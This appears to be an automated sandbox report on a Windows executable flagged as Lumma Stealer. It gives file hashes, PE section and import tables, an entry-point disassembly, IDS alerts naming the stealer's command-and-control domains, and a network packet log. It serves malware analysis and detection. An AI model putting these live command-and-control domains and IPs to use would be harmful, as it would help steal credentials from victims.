                                                                                                                                                                                                                            Entropy (8bit):3.6960191912827103
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJmR6i56Yxu6rgmfE94bkI5VpDw89b75sfrdpm:R6lXJg6i56Yo6rgmfE9VI5N7Sfe
                                                                                                                                                                                                                            MD5:A4EA0332A9B3DF3C2E30044F10B7BD37
                                                                                                                                                                                                                            SHA1:ECC2B5083AA9BB5EB64B4FF153F0D022D993C128
                                                                                                                                                                                                                            SHA-256:3C4F2C68C400931140B38FCD3E4BC905DFC367287B75D6AF2E26549779A53219
                                                                                                                                                                                                                            SHA-512:FA099985C50E2C95AB27628B3A2AADD9B69092C46231CEB0EEC19D6DA6962F26BE430EB937E989784E9F9500A019CE73ABD1DEFFAC5D1BFADC8DD65371FEB757
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.8.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4714
                                                                                                                                                                                                                            Entropy (8bit):4.466671642101293
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsgJg77aI9x2WpW8VYwdYm8M4JOFO3FTqrno+q8vIFOe3ps1d:uIjfmI7PX7Vz8JebnoKsV5s1d
                                                                                                                                                                                                                            MD5:3CD7DCA49701EB9ED1A159F91C292BC8
                                                                                                                                                                                                                            SHA1:2A13E63CD0559D826AB0C6D08C8A70E71E313174
                                                                                                                                                                                                                            SHA-256:A610FD6F4DB07DDDD3081F7B386A09E0C890CFA3705591FCE58F005ED0000D20
                                                                                                                                                                                                                            SHA-512:C79F364D4040ED4441AD6AA8086BDFB84DA3B7BAF092357709B99F364608B71E46345BAC0E8A436A95FF2CEBCF6CEF53971457A9D2C2656EE67C053AD361E14B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672948" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):403968
                                                                                                                                                                                                                            Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                            MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                            SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                            SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                            SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):403968
                                                                                                                                                                                                                            Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                            MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                            SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                            SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                            SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.393769386903021
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:Jl4fiJoH0ncNXiUjt10q5G/gaocYGBoaUMMhA2NX4WABlBuN2ROBSqa:f4vF5MYQUMM6VFYMRU
                                                                                                                                                                                                                            MD5:DCDE0C6E7D9C9AB05923F7AC0CAFB50B
                                                                                                                                                                                                                            SHA1:3E8302ADF66FF7FD3B48F8218AED151A60A9A013
                                                                                                                                                                                                                            SHA-256:4D0EA9B48C84A6B121D1BFA60AD974B1D4E243B9DD49F03F18AF781B70940A99
                                                                                                                                                                                                                            SHA-512:A0F1553BF39FB2D366BC3E26D51DD3E8EB58267800F8ED8A7652D37FABD902AF1C71EB96E56F2B34B4B9227975810FF7D0B078ED92A413EB444A7087469759AF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...e.e..............................................................................................................................................................................................................................................................................................................................................A..Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):6.936743787904761
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:g3toRYa6JE.exe
                                                                                                                                                                                                                            File size:457'728 bytes
                                                                                                                                                                                                                            MD5:4e7e1578abc95ec22d6ed2c61bc5abf9
                                                                                                                                                                                                                            SHA1:d74fb310fdac0dd63483e23e1ca770bf31f91910
                                                                                                                                                                                                                            SHA256:d5639a2aa97a2b14d339613996322b1082b709bbf32b66fd38e17ed909fa678d
                                                                                                                                                                                                                            SHA512:13be7066b180f11fcfc57570d95da6bdd9749c92e2d1814c48abba8871be3662b31e03ed836f34deb47a62a4b0e051af145c655de92b7ba7cc493104898f629d
                                                                                                                                                                                                                            SSDEEP:6144:uoyOjNj+vLR8UpDGZS94iRJLJYp9ToW6vo:FSLaFZSfLJGxvC
                                                                                                                                                                                                                            TLSH:5EA4CF0262FCEED4F7B38A31EE3986E4266FF5629E24A65D31546B1F09753A1C463303
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................Rich............PE..L....#.d...................
                                                                                                                                                                                                                            Icon Hash:86c7c30b0f4e0d99
                                                                                                                                                                                                                            Entrypoint:0x4014b7
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x64E223A5 [Sun Aug 20 14:31:01 2023 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:ed8c9aab5b430953fb9c6d93394d74ac
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            call 00007FB21C8F3594h
                                                                                                                                                                                                                            jmp 00007FB21C8EFD8Dh
                                                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                            sub esp, 00000328h
                                                                                                                                                                                                                            mov dword ptr [00456598h], eax
                                                                                                                                                                                                                            mov dword ptr [00456594h], ecx
                                                                                                                                                                                                                            mov dword ptr [00456590h], edx
                                                                                                                                                                                                                            mov dword ptr [0045658Ch], ebx
                                                                                                                                                                                                                            mov dword ptr [00456588h], esi
                                                                                                                                                                                                                            mov dword ptr [00456584h], edi
                                                                                                                                                                                                                            mov word ptr [004565B0h], ss
                                                                                                                                                                                                                            mov word ptr [004565A4h], cs
                                                                                                                                                                                                                            mov word ptr [00456580h], ds
                                                                                                                                                                                                                            mov word ptr [0045657Ch], es
                                                                                                                                                                                                                            mov word ptr [00456578h], fs
                                                                                                                                                                                                                            mov word ptr [00456574h], gs
                                                                                                                                                                                                                            pushfd
                                                                                                                                                                                                                            pop dword ptr [004565A8h]
                                                                                                                                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                            mov dword ptr [0045659Ch], eax
                                                                                                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                            mov dword ptr [004565A0h], eax
                                                                                                                                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                            mov dword ptr [004565ACh], eax
                                                                                                                                                                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                            mov dword ptr [004564E8h], 00010001h
                                                                                                                                                                                                                            mov eax, dword ptr [004565A0h]
                                                                                                                                                                                                                            mov dword ptr [0045649Ch], eax
                                                                                                                                                                                                                            mov dword ptr [00456490h], C0000409h
                                                                                                                                                                                                                            mov dword ptr [00456494h], 00000001h
                                                                                                                                                                                                                            mov eax, dword ptr [00455004h]
                                                                                                                                                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                            mov eax, dword ptr [00455008h]
                                                                                                                                                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                            call dword ptr [000000A0h]
                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x539ec0x28.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc50000x16fc8.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x535680x40.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x520000x180.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x5008c0x502008d091187821b792057c3d33d55763f88False0.8429242638455539data7.54222030802745IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x520000x22760x2400b9a04c31913161fe7ce436c70af36399False0.3565538194444444OpenPGP Secret Key Version 55.41146976402879IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x550000x67c080x160042963241930806a561099245a49aece9False0.2878196022727273data2.909702893312167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .dodomil0xbd0000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .tokupec0xc30000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .nujov0xc40000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0xc50000x16fc80x1700028b74d4e8429d79bb047977b69576deeFalse0.4593346637228261data5.156880097114051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_CURSOR0xd5b580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                                                            RT_CURSOR0xd5ca00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                            RT_ICON0xc59000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.8278251599147122
                                                                                                                                                                                                                            RT_ICON0xc67a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.8483754512635379
                                                                                                                                                                                                                            RT_ICON0xc70500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.7764976958525346
                                                                                                                                                                                                                            RT_ICON0xc77180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.7102601156069365
                                                                                                                                                                                                                            RT_ICON0xc7c800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.804253112033195
                                                                                                                                                                                                                            RT_ICON0xca2280x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.8426229508196721
                                                                                                                                                                                                                            RT_ICON0xcabb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8625886524822695
                                                                                                                                                                                                                            RT_ICON0xcb0800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3243603411513859
                                                                                                                                                                                                                            RT_ICON0xcbf280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.44765342960288806
                                                                                                                                                                                                                            RT_ICON0xcc7d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5190092165898618
                                                                                                                                                                                                                            RT_ICON0xcce980x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.536849710982659
                                                                                                                                                                                                                            RT_ICON0xcd4000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.28822701688555347
                                                                                                                                                                                                                            RT_ICON0xce4a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.289344262295082
                                                                                                                                                                                                                            RT_ICON0xcee300x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.34131205673758863
                                                                                                                                                                                                                            RT_ICON0xcf3000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2785181236673774
                                                                                                                                                                                                                            RT_ICON0xd01a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36462093862815886
                                                                                                                                                                                                                            RT_ICON0xd0a500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3790322580645161
                                                                                                                                                                                                                            RT_ICON0xd11180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                                                                                                                                                                            RT_ICON0xd16800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2590248962655602
                                                                                                                                                                                                                            RT_ICON0xd3c280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.274624765478424
                                                                                                                                                                                                                            RT_ICON0xd4cd00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28647540983606556
                                                                                                                                                                                                                            RT_ICON0xd56580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3262411347517731
                                                                                                                                                                                                                            RT_STRING0xd6d180x59adata0.4309623430962343
                                                                                                                                                                                                                            RT_STRING0xd72b80xfcdata0.5515873015873016
                                                                                                                                                                                                                            RT_STRING0xd73b80x788data0.42012448132780084
                                                                                                                                                                                                                            RT_STRING0xd7b400x784data0.4287941787941788
                                                                                                                                                                                                                            RT_STRING0xd82c80x726data0.42568306010928963
                                                                                                                                                                                                                            RT_STRING0xd89f00x640data0.439375
                                                                                                                                                                                                                            RT_STRING0xd90300x6bcdata0.4274941995359629
                                                                                                                                                                                                                            RT_STRING0xd96f00x7f2data0.41297935103244837
                                                                                                                                                                                                                            RT_STRING0xd9ee80x786data0.4221183800623053
                                                                                                                                                                                                                            RT_STRING0xda6700x5cedata0.43943472409152085
                                                                                                                                                                                                                            RT_STRING0xdac400x554data0.45234604105571846
                                                                                                                                                                                                                            RT_STRING0xdb1980x60cdata0.4412144702842377
                                                                                                                                                                                                                            RT_STRING0xdb7a80x81cdata0.41570327552986513
                                                                                                                                                                                                                            RT_ACCELERATOR0xd5b380x20data1.15625
                                                                                                                                                                                                                            RT_GROUP_CURSOR0xd5c880x14data1.15
                                                                                                                                                                                                                            RT_GROUP_CURSOR0xd6b480x14data1.25
                                                                                                                                                                                                                            RT_GROUP_ICON0xcb0180x68data0.7115384615384616
                                                                                                                                                                                                                            RT_GROUP_ICON0xd5ac00x76data0.6779661016949152
                                                                                                                                                                                                                            RT_GROUP_ICON0xcf2980x68data0.7115384615384616
                                                                                                                                                                                                                            RT_VERSION0xd6b600x1b4data0.5825688073394495
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            KERNEL32.dllSetThreadContext, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, SetFileTime, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, GetStartupInfoA, SetLastError, GetProcAddress, GetLongPathNameA, SearchPathA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, AddAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeA, FindAtomW, DeleteTimerQueueTimer, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, CloseHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetModuleHandleA
                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2025-01-12T17:45:27.961623+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949707104.21.56.70443TCP
                                                                                                                                                                                                                            2025-01-12T17:45:28.771496+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949708176.113.115.1980TCP
                                                                                                                                                                                                                            2025-01-12T17:45:31.991559+01002059088ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)1192.168.2.9622621.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.005795+01002059051ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)1192.168.2.9576511.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.466156+01002059051ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)1192.168.2.9633541.1.1.153TCP
                                                                                                                                                                                                                            2025-01-12T17:45:32.468764+01002059041ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)1192.168.2.9518841.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.479037+01002059035ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)1192.168.2.9548701.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.491901+01002059039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)1192.168.2.9631891.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.501843+01002059057ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)1192.168.2.9520701.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.512266+01002059037ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)1192.168.2.9507591.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.610364+01002059043ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)1192.168.2.9585561.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:32.711611+01002059049ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)1192.168.2.9626681.1.1.153UDP
                                                                                                                                                                                                                            2025-01-12T17:45:33.427318+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.963355104.102.49.254443TCP
                                                                                                                                                                                                                            2025-01-12T17:45:34.023359+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.963355104.102.49.254443TCP
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.562226057 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.562262058 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.562347889 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.578079939 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.578093052 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.059883118 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.060128927 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.640758991 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.640780926 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.641813040 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.641881943 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.645826101 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.691320896 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.961702108 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.961780071 CET49707443192.168.2.9104.21.56.70
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.961788893 CET44349707104.21.56.70192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:27.961833000 CET49707443192.168.2.9104.21.56.70
